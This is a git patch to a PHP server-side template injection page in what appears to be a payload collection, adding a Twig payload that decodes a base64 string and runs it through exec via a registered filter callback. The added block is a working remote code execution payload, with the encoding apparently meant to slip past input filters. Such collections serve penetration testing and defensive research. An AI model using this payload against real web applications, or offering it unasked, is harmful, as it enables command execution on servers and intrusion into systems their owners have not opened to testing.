From 289573def1cb30b9370db1e22772af0231d01d3e Mon Sep 17 00:00:00 2001
From: BootstrapBool <bootstrapbool@gmail.com>
Date: Wed, 15 Apr 2026 19:30:00 -0400
Subject: [PATCH] Adds base64 encoded twig payload

---
 Server Side Template Injection/PHP.md | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md
index 7b9c0a92..9f4f2b73 100644
--- a/Server Side Template Injection/PHP.md	
+++ b/Server Side Template Injection/PHP.md	
@@ -201,6 +201,12 @@ The following payload, which harnesses the built-in `_context` variable, also ac
 
 Reference and explanation of payload can be found [yeswehack/server-side-template-injection-exploitation](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation).
 
+The following allows passing of a Base64 encoded payload.
+
+```twig
+{%set a%}UTF-8{%endset%}{%set b%}BASE64{%endset%}{%set p%}base64 encoded string{%endset%}{%set p = p|convert_encoding((a), (b))%}{%set e%}exec{%endset%}{{_self.env.registerUndefinedFilterCallback(e|lower)}}{{_self.env.getFilter(p)}}
+```
+
 ---
 
 ## Latte